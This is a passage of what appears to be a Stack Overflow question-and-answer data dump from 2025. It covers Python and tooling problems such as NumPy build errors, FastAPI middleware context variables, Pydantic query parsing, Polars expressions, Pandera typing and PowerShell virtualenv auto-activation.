directory 14014 | #include "internal/pycore_frame.h" | ^~~~~~~~~~~~~~~~~~~~~~~~~ compilation terminated. [495/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_mt19937.pyx [496/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_s_lapack.c.obj [497/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_philox.pyx [498/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_sfc64.pyx [499/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_z_lapack.c.obj [500/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/bit_generator.pyx [501/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_d_lapack.c.obj [502/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_blas.c.obj [503/530] Compiling Cython source numpy/random/_bounded_integers.pyx [504/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_s_lapack.c.obj [505/530] Compiling Cython source C:/Users/semva/AppData/Local/Temp/pip-install-0q1qbetl/numpy_627fd22ca8764d2db937a682f82fea68/numpy/random/_common.pyx [506/530] Compiling C++ object numpy/fft/_pocketfft_umath.pypy311-pp73-win_amd64.pyd.p/_pocketfft_umath.cpp.obj [507/530] Compiling Cython source numpy/random/_generator.pyx ninja: build stopped: subcommand failed. INFO: autodetecting backend as ninja INFO: calculating backend command to run: C:\Users\semva\AppData\Local\Temp\pip-build-env-3vh8v_of\normal\Scripts\ninja.EXE [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: metadata-generation-failed ├ù Encountered error while generating package metadata. Ôò░ÔöÇ> See above for output. note: This is an issue with the package mentioned above, not pip. hint: See above for details. --end of error-- When trying to install numpy with Python 3.11 (without PyPy), it gets installed without errors. Software information: pypy --version: [PyPy 7.3.19 with MSC v.1941 64 bit (AMD64)] os: Windows 11 24H2 | There are wheels for the next NumPy version available on anacoda.org, you can use them with ` pip install -i https://pypi.anaconda.org/scientific-python-nightly-wheels/simple numpy | 1 | 2 |
79,547,496 | 2025-4-1 | https://stackoverflow.com/questions/79547496/use-greater-equal-less-comparison-result-as-dictionary-key | Is there a clean way to store the values comparison result as dictionary key, naming >, =, and < (not the str format, but the state of "greater" for example). Curious if this could be a way to replace wordy if a > b: print(f'{a} > {b}') elif a == b: print(f'{a} = {b}') else: print(f'{a} < {b}') with a dict d = { >: '{a} > {b}', # > is something I don't know how to use, not str('>') =: '{a} = {b}', <: '{a} < {b}', } Then I can use it like compare_result = a > b # I know this returns boolean; I need a way to return a comparison result in one of {>, =, <} print(d[compare_result].format(a, b)) something like that. | The operator module contains actual function objects for greater-than, less-than, equal, etc. import operator d = { operator.gt: '{a} > {b}', operator.eq: '{a} = {b}', operator.lt: '{a} < {b}', } | 1 | 1 |
79,565,969 | 2025-4-10 | https://stackoverflow.com/questions/79565969/importerror-when-importing-numpy-missing-libgfortran-5-dylib-on-macos-vs-code | I’m working on macOS Sequoia 15.4, using VS Code and Jupyter Notebooks with Conda environments. Everything worked fine until yesterday. Now, when I try to run any of my existing environments, importing NumPy or other scientific libraries results in the following ImportError related to libgfortran.5.dylib. ImportError: dlopen(..._multiarray_umath.cpython-39-darwin.so): Library not loaded: @rpath/libgfortran.5.dylib Referenced from: /Users/.../miniconda3/envs/PARESIS/lib/libopenblasp-r0.3.21.dylib Reason: tried: '/Users/.../libgfortran.5.dylib' (duplicate LC_RPATH '@loader_path'), '/usr/local/lib/libgfortran.5.dylib' (no such file), '/usr/lib/libgfortran.5.dylib' (no such file, not in dyld cache) This ends with: ImportError: Error importing numpy: you should not try to import numpy from its source directory; please exit the numpy source tree, and relaunch your python interpreter from there. This happens only in older environments. If I create a new Conda environment, everything works fine. I tried reinstalling NumPy using conda install numpy --force-reinstall , and also explicitly installing libgfortran=5 in the affected environment. I also updated Conda, restarted my system, and relaunched VS Code multiple times. I expected NumPy to be reinstalled correctly and the missing library issue to be resolved, but the error persists. I was hoping to avoid recreating all my environments from scratch since I have a lot of dependencies already configured. | As mentioned previously, this is similar to this question. MacOS Sequoia 15.4.1 update raises an error for duplicate R paths, which triggers the error you mentioned for typically 'old' environments. If you don't want to re-create an environment, you can try to install libgfortran5 package to its version which avoids the error (>=14), e.g. run this command with your environment activated: conda install "libgfortran5>=14" It should fix the error without having to reinstall everything, assuming the version is compatible with other dependancies and that it's the only one causing the error. | 1 | 5 |
79,573,221 | 2025-4-14 | https://stackoverflow.com/questions/79573221/keep-context-vars-values-between-fastapi-starlette-middlewares-depending-on-the | I am developing a FastAPI app, and my goal is to record some information in a Request scope and then reuse this information later in log records. My idea was to use context vars to store the "request context", use a middleware to manipulate the request and set the context var, and finally use a LogFilter to attach the context vars values to the LogRecord. This is my app skeleton logger = logging.getLogger(__name__) app = FastAPI() app.add_middleware(SetterMiddlware) app.add_middleware(FooMiddleware) @app.get("/") def read_root(setter = Depends(set_request_id)): print("Adding req_id to body", req_id.get()) # This is 1234567890 logging.info("hello") return {"Req_id": str(req_id.get())} and those are my middlewares class SetterMiddlware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): calculated_id = "1234567890" req_id.set(calculated_id) request.state.req_id = calculated_id response = await call_next(request) return response class FooMiddleware(BaseHTTPMiddleware): async def dispatch(self, request: Request, call_next): response = await call_next(request) return response and the Logging Filter from vars import req_id class CustomFilter(Filter): """Logging filter to attach the user's authorization to log records""" def filter(self, record: LogRecord) -> bool: record.req_id = req_id.get() return True And finally following a part of my log configuration ... "formatters": { "default": { "format": "%(levelname)-9s %(asctime)s [%(req_id)s]| %(message)s", "datefmt": "%Y-%m-%d,%H:%M:%S", }, }, "handlers": { ... "handlers": { "console": { "class": "logging.StreamHandler", "formatter": "default", "stream": "ext://sys.stderr", "filters": [ "custom_filter", ], "level": logging.NOTSET, }, ... "loggers": { "": { "handlers": ["console"], "level": logging.DEBUG, }, "uvicorn": {"handlers": ["console"], "propagate": False}, }, When SetterMiddlware is the latest added in the app (FooMiddleware commented in the example), my app logs as expected Adding req_id to body 1234567890 INFO 2025-04-14,15:02:28 [1234567890]| hello INFO 2025-04-14,15:02:28 [1234567890]| 127.0.0.1:52912 - "GET / HTTP/1.1" 200 But if I add some other middleware after SetterMiddlware, uvicorn logger does not find anymore the context_var req_id set. Adding req_id to body 1234567890 INFO 2025-04-14,15:03:56 [1234567890]| hello INFO 2025-04-14,15:03:56 [None]| 127.0.0.1:52919 - "GET / HTTP/1.1" 200 I tried using the package https://starlette-context.readthedocs.io/en/latest/ but I wasn't luckier; it looks like it suffers the same problems. I would like to know why this behavior happens and how I can fix it, without the constraint of having the SetterMiddleware in the last middleware position. | Currently dealing with a similar setup and I spent some time digging.. I'm not sure if this truly answers the why in your question but what I found is that if I use a custom middleware class without inheriting from BaseHTTPMiddleware (à la Pure ASGI Middleware) the context variables get propagated correctly to the uvicorn access logger. This might have something to do with the known starlette BaseHTTPMiddleware limitation of not propagating contextvars "upwards". IIRC there are also some raised anyio issues related to contextvars... So the solution would be along the lines of: from starlette.types import ASGIApp, Receive, Scope, Send class SetterMiddlware: def __init__(self, app: ASGIApp) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: calculated_id = "1234567890" req_id.set(calculated_id) request = Request(scope, receive) request.state.req_id = calculated_id response = await self.app(scope, receive, send) return response class FooMiddleware: def __init__(self, app: ASGIApp) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: response = await self.app(scope, receive, send) return response | 2 | 1 |
79,573,908 | 2025-4-14 | https://stackoverflow.com/questions/79573908/openai-assistants-with-citations-like-42-source-and-citeturnxfiley | When streaming with OpenAI Assistants openai.beta.threads.messages.create( thread_id=thread_id, role="user", content=payload.question ) run = openai.beta.threads.runs.create( thread_id=thread_id, assistant_id=assistant_id, stream=True, tool_choice={"type": "file_search"}, ) streamed_text = "" for event in run: if event.event == "thread.message.delta": delta_content = event.data.delta.content if delta_content and delta_content[0].type == "text": text_fragment = delta_content[0].text.value streamed_text += text_fragment yield {"data": text_fragment} if event.event == "thread.run.completed": break the citations are coming in the formats like 【4:2†source】 or citeturnXfileY How to fix it? | The approach I've used was to get the final message after streaming messages = openai.beta.threads.messages.list(thread_id=thread_id) and then apply the following regex def replace_placeholder(match): nonlocal citation_index citation_index += 1 return f"[{citation_index}]" pattern = r"(citeturn\d+file\d+|【\d+:\d+†.*?】)" citation_index = 0 assistant_reply_cleaned = re.sub(pattern, replace_placeholder, raw_text) to replace the placeholders (like 【4:2†source】 or citeturnXfileY) with [1], [2], etc | 1 | 1 |
79,572,368 | 2025-4-14 | https://stackoverflow.com/questions/79572368/parsing-pydantic-dict-params | I have an endpoint that takes a Pydantic model, Foo, as a query parameter. from typing import Annotated import uvicorn from fastapi import FastAPI, Query from pydantic import BaseModel app = FastAPI() class Foo(BaseModel): bar: str baz: dict[str, str] @app.get("/") def root(foo: Annotated[Foo, Query()]): return foo if __name__ == "__main__": uvicorn.run("test:app") I'm defining my query params using Swagger, so the encoding should be correct. I know the baz param syntax looks redundant because I've nested a dictionary, but parsing fails even without nesting. But when I call the endpoint... curl -X 'GET' \ 'http://127.0.0.1:8000/?bar=sda&baz=%7B%22abc%22%3A%22def%22%7D' \ -H 'accept: application/json' FastAPI does not seem to read in Foo.baz correctly, returning { "detail": [ { "type": "dict_type", "loc": [ "query", "baz" ], "msg": "Input should be a valid dictionary", "input": "{\"abc\":\"def\"}" } ] } I've read similar questions and I know I can ingest the dictionary by accessing dict(request.query_params), but this bypasses FastAPI's validation and I'd prefer to keep the endpoint simple and consistent with the rest of my codebase by keeping the param as a Pydantic model. How can I get FastAPI to parse Foo as a query param? | It is indeed a complex subjects for which I see mainly 2 paths forward. Parse your dictionary from the query It is actually possible to get the dictionary back from the query parameters: from pydantic import BaseModel, Json class Foo(BaseModel): bar: str baz: Json When baz will receive the Json string, it will be parsed into a dictionary. This method changes the openapi schema, so swagger will render baz as a file input. openapi schema: "parameters": [ {"name": "bar",...}, { "name": "baz", "in": "query", "required": true, "schema": { "type": "string", "contentMediaType": "application/json", "contentSchema": {}, "title": "Baz" } } ] swagger rendering: If swagger is important to you, you can use your custom Json loader type that will render as a textarea: from typing import Annotated import json from pydantic import BaseModel, Json, BeforeValidator CustomJsonValidator = Annotated[dict[str, str], BeforeValidator(json.loads)] class Foo(BaseModel): bar: str baz: CustomJsonValidator The associated openapi schema will be: "parameters": [ {"name": "bar", ...}, { "name": "baz", "in": "query", "required": true, "schema": { "type": "object", "additionalProperties": { "type": "string" }, "title": "Baz" } } ] and swagger will render like the following: Explicit all of the filters If possible, you can explicit all of your filters in a pydantic schema (a bit like flattening out baz dictionary). It can avoid potential issue since it's way harder to validate a dictionary than fields. Of course, you will have to use None by defaults a bit everywhere, but you can always exclude them from your model dumping. from typing import Literal from pydantic import BaseModel class Foo(BaseModel): bar: str abc: Literal["def"] | None = None ghi: str | None = None jkl: int | None = None If you have filters that can't be used together, you can use pydantic unions for that. Let's say "abc" and "ghi" filters must always coexist, but can't be defined along with "jkl". You would have: from typing import Literal from pydantic import BaseModel class GoodLuckNamingThat(BaseModel): bar: str abc: Literal["def"] ghi: str class AnotherNamingNightmare(BaseModel): bar: str jkl: int @app.get("/") def root(foo: Annotated[GoodLuckNamingThat | AnotherNamingNightmare, Query()]): return foo | 1 | 3 |
79,571,481 | 2025-4-13 | https://stackoverflow.com/questions/79571481/get-current-function-name | Executing vscode.executeDocumentSymbolProvider gives me all symbols in the file. Can I somehow get name of the function that the cursor is currently in? | If you only want the top-most outer function that the cursor is in, then the answer is fairly straightforward. If you wanted to consider multiple nested functions then it get much trickier. Scan through the symbols. finding the symbol range that contains the cursor: const symbols = await vscode.commands.executeCommand('vscode.executeDocumentSymbolProvider', document.uri); const targetSymbol = Object.values(symbols).find(childSymbol => { return childSymbol.kind === vscode.SymbolKind.Function) && childSymbol.range.contains(selection.active); }); The childSymbol's will be all the top-level symbols in your document. | 1 | 1 |
79,573,420 | 2025-4-14 | https://stackoverflow.com/questions/79573420/should-i-always-use-asyncio-lock-for-fairness | I have a Python service that uses Python's virtual threads (threading.Thread) to handle requests. There is a shared singleton functionality that all threads are trying to access, which is protected using threading.Lock. g_lock = threading.Lock() def my_threaded_functionality(): try: g_lock.acquire() # ... Do something with a shared resource ... finally: g_lock.release() In the docs of threading.Lock.acquire, there is no mentioning of fairness, whereas, in asyncio's asyncio.Lock.acquire, they mention that the lock is fair. As I want to prevent starvation of threads, and want to preserve the order of the tasks the same as they have arrived, I would go for asyncio's Lock if they didn't mention that the locks are not thread safe. The question is whether it should be an issue also with Python's virtual "threads". | Python's virtual threads (threading.Thread) CPython threads are native threads, not virtual threads, the concept of virtual threads doesn't exist in CPython. asyncio's Lock is not thread-safe, you cannot use it for multithreaded synchronization, only threading.Lock is safe for multithreaded access. you can serialize access to this resource with a threadpool of 1 thread, it has a queue internally and guarantees fairness (first-in-first-out), don't use locks. as a bonus you can use loop.run_in_executor to await it in your eventloops. my_pool = concurrent.futures.ThreadPoolExecutor(max_workers=1) def non_thread_safe_task(): return "not thread-safe" async def my_threaded_functionality_async(): my_loop = asyncio.get_running_loop() result = await my_loop.run_in_executor(my_pool, non_thread_safe_task) def my_threaded_functionality(): result = my_pool.submit(non_thread_safe_task).result() concurrent.futures.ThreadPoolExecutor spawns threads lazily, so it is okay to have it in the global scope, it doesn't create a thread if it is not used, but i'd rather wrap the whole thing in a class. Note: sending work to other threads and back adds roughly 10-50 microseconds of latency, only use it if you must guarantee order, otherwise just use a threading.Lock g_lock = threading.Lock() def my_threaded_functionality(): with g_lock: # ... Do something with a shared resource ... there's also an async version to lock threading.Lock in an eventloop (which also has this extra 10-50 microseconds of overhead ... , i'd probably use the 1 worker thread_pool if you are in async code, that's also multithreaded) | 1 | 1 |
79,567,168 | 2025-4-10 | https://stackoverflow.com/questions/79567168/how-can-i-get-llvm-loop-vectorization-debug-output-in-numba | I'm trying to view LLVM debug messages for loop vectorization using Numba and llvmlite. I want to see the loop vectorization "LV:" debug output (e.g., messages like LV: Checking a loop in ...) so I can analyze the vectorization decisions made by LLVM. https://numba.readthedocs.io/en/stable/user/faq.html#does-numba-vectorize-array-computations-simd I'm using a conda environment with the following YAML file. This makes sure I’m using the llvmlite build from the numba channel (which should have LLVM built with assertions enabled): name: numbadev channels: - defaults - numba dependencies: - python>=3.12.9 - numba::numba - numba::llvmlite - intel-cmplr-lib-rt Running conda list shows: # Name Version Build Channel python 3.13.2 hf623796_100_cp313 llvmlite 0.44.0 py313h84b9e52_0 numba numba 0.61.2 np2.1py3.13hf94e718_g1e70d8ceb_0 numba ... This is my script debug_loop_vectorization.py: import llvmlite.binding as llvm llvm.set_option('', '--debug-only=loop-vectorize') import numpy as np from numba import jit @jit(nopython=True, fastmath=True) def test_func(a): result = 0.0 for i in range(a.shape[0]): result += a[i] * 2.0 return result # Trigger compilation. a = np.arange(1000, dtype=np.float64) test_func(a) # Print the LLVM IR print(test_func.inspect_llvm(test_func.signatures[0])) When I run the script from a Linux terminal I see the LLVM-IR but no lines starting with "LV:...". How can I get LLVM loop vectorization debug output? Edit: I've tried to call the script from the Linux terminal like this: conda activate numbadev cd /PathToMyFile/ python debug_loop_vectorization.py or like this: LLVM_DEBUG=1 python debug_loop_vectorization.py 2>&1 | grep '^LV:' Edit: In llvmlite/conda-recipes/llvmdev, bld.bat contains a cmake argument "DLLVM_ENABLE_ASSERTIONS=ON". https://github.com/numba/llvmlite/blob/main/conda-recipes/llvmdev/bld.bat#L32 build.sh doesn't contain "_cmake_config+=(-DLLVM_ENABLE_ASSERTIONS:BOOL=ON)" anymore. https://github.com/numba/llvmlite/blob/main/conda-recipes/llvmdev/build.sh Edit: LLVM debug messages have been disabled in the Linux build unintentionally and should be enabled in LLVMlite v0.45.0 on the Numba channel. | On Linux, a workaround solution for tests is to use Numba 0.60.0. Indeed, it is based on LLVMlite v0.43.0 which is build with an LLVM version having assertions. On Linux, newer versions (e.g. Numba 0.61.2 and LLVMlite v0.44.0) do not embed an LLVM supporting assertions (apparently due to a code cleaning). Thus it must be build manually with . One solution with newer version is to recompile LLVMlite and its embedded LLVM locally so assertions are enabled. This can be done by setting -DLLVM_ENABLE_ASSERTIONS:BOOL=ON in CMAKE_ARGS before the build. Alternatively, you can add this line in the conda-recipes/llvmdev/build.sh file. On Windows, this works well by default so far. There is nothing to do. | 1 | 2 |
79,573,449 | 2025-4-14 | https://stackoverflow.com/questions/79573449/removing-elements-based-on-nested-dictionary-values | I have a complex nested dictionary structure and I need to remove elements based on the values in a nested dictionary. My dictionary looks like this: my_dict = { 'item1': {'name': 'Apple', 'price': 1.0, 'category': {'id': 1, 'name': 'Fruit'}}, 'item2': {'name': 'Banana', 'price': 0.5, 'category': {'id': 1, 'name': 'Fruit'}}, 'item3': {'name': 'Carrot', 'price': 0.75, 'category': {'id': 2, 'name': 'Vegetable'}}, 'item4': {'name': 'Broccoli', 'price': 1.5, 'category': {'id': 2, 'name': 'Vegetable'}} } I want to filter this dictionary to only include items belonging to the 'Fruit' category. I tried the following code: new_dict = {} for key, value in my_dict.items(): if value['category']['name'] == 'Fruit': new_dict[key] = value print(new_dict) This works, but I'm wondering if there's a more concise or Pythonic way to achieve this, perhaps using dictionary comprehension or a filtering function like filter(). | As a dictionary comprehension A dictionary comprehension can be used to create dictionaries from arbitrary key and value expressions. new_dict2 = { key: value for key, value in my_dict.items() if value['category']['name'] == 'Fruit' } new_dict2 == new_dict # True Using filter() The filter() function is used to: Construct an iterator from those elements of iterable for which function is true. The dict.items() returns an iterable where each element is a tuple of length 2. We can supply each item to a lambda function, where item[0] will be the key and item[1] the value. filter() returns an iterator of the tuples which match the condition. We can wrap this in dict() to get a dictionary (in the same way that dict([("key1", "value1"), ("key2", "value2")]) returns {'key1': 'value1', 'key2': 'value2'}). new_dict3 = dict( filter( lambda item: item[1]['category']['name'] == 'Fruit', my_dict.items() ) ) new_dict3 == new_dict # True Most Pythonic way Achieving the nebulous goal of Pythonicness (Pythonicity?) is always somewhat subjective. I think a dictionary comprehension is clean and neat but it can be hard to see what it's doing, especially if the dict is deeply nested or the condition is complex. It's probably clearest if you wrap it in an appropriately-named function so you can see what's going on. I've added type annotations for clarity: def find_fruit(d: dict[str, dict]) -> dict[str, dict]: def is_fruit(key: str, value: dict) -> bool: return value["category"]["name"] == "Fruit" return {key: value for key, value in d.items() if is_fruit(key, value)} fruit_dict = find_fruit(my_dict) new_dict == fruit_dict # True This is fundamentally the same as the first approach but easier on the eyes. | 7 | 6 |
79,574,127 | 2025-4-14 | https://stackoverflow.com/questions/79574127/cannot-see-all-dense-layer-info-from-search-space-summary-when-using-rand | I am trying to use keras-tuner to tune hyperparameters, like !pip install keras-tuner --upgrade import keras_tuner as kt from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten from tensorflow.keras.optimizers import Adam def build_model(hp): model = Sequential([ Flatten(input_shape=(28, 28)), Dense(units= hp.Int('units', min_value = 16, max_value = 64, step = 16), activation='relu'), Dense(units = hp.Int('units', min_value = 8, max_value = 20, step = 2), activation='softmax') ]) model.compile( optimizer=Adam(learning_rate=hp.Float('learning_rate', min_value=1e-4, max_value=1e-2, sampling='LOG')), loss='sparse_categorical_crossentropy', metrics=['accuracy'] ) return model # Create a RandomSearch Tuner tuner = kt.RandomSearch( build_model, objective='val_accuracy', max_trials=10, executions_per_trial=2 ) # Display a summary of the search space tuner.search_space_summary() shows Search space summary Default search space size: 2 units (Int) {'default': None, 'conditions': [], 'min_value': 16, 'max_value': 64, 'step': 16, 'sampling': 'linear'} learning_rate (Float) {'default': 0.0001, 'conditions': [], 'min_value': 0.0001, 'max_value': 0.01, 'step': None, 'sampling': 'log'} However, when checking the search_space_summary() output, only the 1st Dense layer is shown in the summary, while the information about the 2nd Dense layer, i.e., Dense(units = hp.Int('units', min_value = 8, max_value = 20, step = 2), activation='softmax'), is not seen. Did I misconfigured something or it is supposed to yield the output like that? Could anyone help me to understand why it outputs the summary like this? | Each hyperparameter must have a unique name. This is also listed in the docs. In your case, both layer units parameters are called units . You should rename them to something like units_1 and units_2, for example. | 2 | 2 |
79,574,115 | 2025-4-14 | https://stackoverflow.com/questions/79574115/why-wont-polars-when-and-then-run-in-jupyters-notebook | I'm trying to insert/make a new column with these attributes in lines of then("") but i get columnNotFoundError instead for the lines of .then(). But these does not exists yet, what is wrong with the code? df_2023 = df_2023.with_columns( pl.when(pl.col("Tillatt totalvekt opp til og med 3500").eq("X")) .then("Opp til og med 3500") .when(pl.col("Tillatt totalvekt 3501-7500").eq("X")) .then("3501-7500") .when(pl.col("Tillatt totalvekt over 7500").eq("X")) .then("Over 7500") .otherwise(pl.lit(None).cast(pl.String)) .alias("Tillatt totalvekt") ) df_2023.select("Tillat totalvekt").head() *THE ERROR* *ColumnNotFoundError: Opp til og med 3500* I also tried with: pl.when(pl.col("Tillatt totalvekt opp til og med 3500") == "X") .then("Opp til og med 3500") I could really use some help, read also the Polars documentation for polars.when, but it was for no help to solve this problem. Thanks in advance! | The then construct assumes strings are column names. I guess "Opp til og med 3500" is a literal value in your code and not a column name. Use pl.lit('....') to define a literal value explicitly, that way polars won't consider it as a column name. In your case, .then(pl.lit("Opp til og med 3500")) (same for other then). Some more details: https://github.com/pola-rs/polars/issues/13805 | 2 | 3 |
79,571,227 | 2025-4-13 | https://stackoverflow.com/questions/79571227/difference-in-variable-values-in-jax-non-jit-runtime-and-jit-transformed-runtime | I have a deep learning mode which I am running in the jit transformed manner by: my_function_checked = checkify.checkify(model.apply) model_jitted = jax.jit(my_function_checked) err, pred = model_jitted({"params": params}, batch, training=training, rng=rng) err.throw() The code is compiling fine, but now I want to debug the intermediate values after every few steps, save the arrays, and then compare them with pytorch tensors. For this, I need to repeatedly save the arrays. The easiest way to do this is to use any IDE's inbuilt debugger and evaluate the save expression after every few steps. But jax.jit transformed code doesn't allow external debuggers. But, I can do this after disabling the jit. Should I be expecting any discrepancies between the two runs? Can I assume that the values in jit and non-jit runs will remain same? | In general when comparing the same JAX operation with and without JIT, you should expect equivalence up to typical floating point rounding errors, but you should not expect bitwise equivalence, as the compiler may fuse operations in a way that leads to differing float error accumulation. | 1 | 2 |
79,572,227 | 2025-4-14 | https://stackoverflow.com/questions/79572227/how-to-annotate-a-pandas-index-of-datetime-date-values-using-pandera-and-mypy | I'm using Pandera to define a schema for a pandas DataFrame where the index represents calendar dates (without time). I want to type-annotate the index as holding datetime.date values. Here's what I tried: # mypy.ini [mypy] plugins = pandera.mypy # schema.py from datetime import date import pandera as pa from pandera.typing import Index class DateIndexModel(pa.DataFrameModel): date: Index[date] But running mypy gives the following error: error: Type argument "date" of "Index" must be a subtype of "bool | int | str | float | ExtensionDtype | <30 more items>" [type-var] Found 1 error in 1 file (checked 1 source file) I know that datetime64[ns] or pandas.Timestamp work fine, but I specifically want to model just dates without time. Is there a type-safe way to do this with Pandera and mypy? Any workaround that lets me enforce date-only index semantics (with or without datetime.date) while keeping mypy happy? Colab example notebook: https://colab.research.google.com/drive/1AdiztxHlyvEMo6B3CzYnvzlnh6a0GfUQ?usp=sharing | TL;DR use Index[pa.engines.pandas_engine.Date] Pandera as of now does not support datetime.date series data type, but it has a semantic representation of a date type column for each library (pandas, polars, pyarrow etc). Date type for pandas.DataFrames is pa.engines.pandas_engine.Date , for the others you can see the API docs. From the pandera documentation: class pandera.engines.pandas_engine.Date(to_datetime_kwargs=None) Semantic representation of a date data type. # schema.py import pandera as pa from pandera.typing import Index class DateIndexModel(pa.DataFrameModel): date: Index[pa.engines.pandas_engine.Date] | 1 | 1 |
79,574,073 | 2025-4-14 | https://stackoverflow.com/questions/79574073/how-to-find-full-delta-using-python-deepdiff | I wrote the following simple test: deeptest.py from deepdiff import DeepDiff, Delta dict1 = {'catalog': {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}} dict2 = {} diff = DeepDiff(dict1, dict2) print(diff) delta = Delta(diff) print(f'delta {delta}') On the console I observe: $ python python/deep_test.py {'dictionary_item_removed': ["root['catalog']"]} delta <Delta: {"dictionary_item_removed":{"root['catalog']":{"uuid":""}}}> My question/issue is that the delta should be the entirety if dict1, but not all of it is shown...why? | A DeepDiff returns an object that has already calculated the difference of the 2 items. The format of the object is chosen by the view parameter. By default it uses view=’text’, but there is also tree view, which is more complicated and detailed, and pretty() method. You can read about it in the documentation But the thing you probably means is verbose_level option Higher verbose level shows you more details. For example verbose level 1 shows what dictionary item are added or removed. And verbose level 2 shows the value of the items that are added or removed too. from deepdiff import DeepDiff, Delta dict1 = {'catalog': {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}} dict2 = {} diff = DeepDiff(dict1, dict2, verbose_level=2) print(diff) delta = Delta(diff) print(f'delta {delta}') Output: {'dictionary_item_removed': {"root['catalog']": {'uuid': 'e95fb23c-57d2-495f-8ab5-2c6b3152bcee', 'metadata': {'title': 'Catalog', 'last-modified': '2025-04-10T16:00:34.033789-05:00', 'version': '1.0', 'oscal-version': '1.1.2'}, 'controls': [{'id': 'ac-1', 'title': 'Access Control', 'parts': [{'id': 'ac-1_stmt', 'name': 'statement', 'prose': 'Access control text.'}]}]}}} delta <Delta: {"dictionary_item_removed":{"root['catalog']":{"uuid":""}}}> | 1 | 2 |
79,573,720 | 2025-4-14 | https://stackoverflow.com/questions/79573720/is-there-a-way-to-automate-activating-the-virtualenv-in-powershell-in-windows | I know that to activate virtualenv it's just .venv/Scripts/activate.ps1 but I was wondering if there's a way of having powershell do it automatically? Existing ones just talk about activating it, but not how to have Powershell do it automatically virtualenv in PowerShell? How to activate virtualenv using PowerShell? I am looking for something like this but in Powershell Automating virtualenv activation/deactivation in zsh | Add something like the following to your PowerShell $PROFILE file: $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction = [Delegate]::Combine( $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction, [EventHandler[System.Management.Automation.LocationChangedEventArgs]] { # Look for a virtual-environment activation script relative to the # new working directory and, if found, execute it. if ($script = Get-Item -ErrorAction Ignore -LiteralPath ./.venv/Script/activate.ps1) { Write-Verbose -Verbose "Activating virtual environment in $PWD..." & $script } } ) Note: This installs an event handler that executes whenever the current location (directory) is changed in the current session and executes a script located in ./.venv/Script/activate.ps1 relative to the new current directory, if present. Note: The script's success output, if any, will not print to the display by default (though errors and output from other streams (other than the success one) would); to ensure that it prints, use & $script | Out-Host No attempt is made to deactivate a previously active virtual environment or to detect if a subdirectory of a directory containing a virtual environment is changed to, though doing these things would be possible with additional effort. Through use of [Delegate]::Combine(), the code preserves any preexisting event handler. If you can assume that there is none, you can omit this call and assign the script block ({ ... }) directly to $ExecutionContext.SessionState.InvokeCommand.LocationChangedAction | 2 | 2 |
79,569,354 | 2025-4-11 | https://stackoverflow.com/questions/79569354/for-multi-index-columns-in-pandas-dataframe-how-can-i-group-index-of-a-particul | I have a pandas dataframe which is basically a pivot table. df.plot(kind = "bar",stacked = True) results in following plot. The labels in x-axis are congested as shown. In Excel I can group the first index value for Scenarios pes, tes and des are clear and distinct as shown: How can I create similar labels in x-axis using matplotlib in Python? Here is a sample dataset with minimal code: dict = {'BatteryStorage': {('des-PDef3', 'Central Africa'): 0.0, ('des-PDef3', 'Eastern Africa'): 2475.9, ('des-PDef3', 'North Africa'): 98.0, ('des-PDef3', 'Southern Africa'): 124.0, ('des-PDef3', 'West Africa'): 1500.24, ('pes-PDef3', 'Central Africa'): 0.0, ('pes-PDef3', 'Eastern Africa'): 58.03, ('pes-PDef3', 'North Africa'): 98.0, ('pes-PDef3', 'Southern Africa'): 124.0, ('pes-PDef3', 'West Africa'): 0.0, ('tes-PDef3', 'Central Africa'): 0.0, ('tes-PDef3', 'Eastern Africa'): 1175.86, ('tes-PDef3', 'North Africa'): 98.0, ('tes-PDef3', 'Southern Africa'): 124.0, ('tes-PDef3', 'West Africa'): 0.0}, 'Biomass PP': {('des-PDef3', 'Central Africa'): 44.24, ('des-PDef3', 'Eastern Africa'): 1362.4, ('des-PDef3', 'North Africa'): 178.29, ('des-PDef3', 'Southern Africa'): 210.01999999999998, ('des-PDef3', 'West Africa'): 277.4, ('pes-PDef3', 'Central Africa'): 44.24, ('pes-PDef3', 'Eastern Africa'): 985.36, ('pes-PDef3', 'North Africa'): 90.93, ('pes-PDef3', 'Southern Africa'): 144.99, ('pes-PDef3', 'West Africa'): 130.33, ('tes-PDef3', 'Central Africa'): 44.24, ('tes-PDef3', 'Eastern Africa'): 1362.4, ('tes-PDef3', 'North Africa'): 178.29, ('tes-PDef3', 'Southern Africa'): 210.01999999999998, 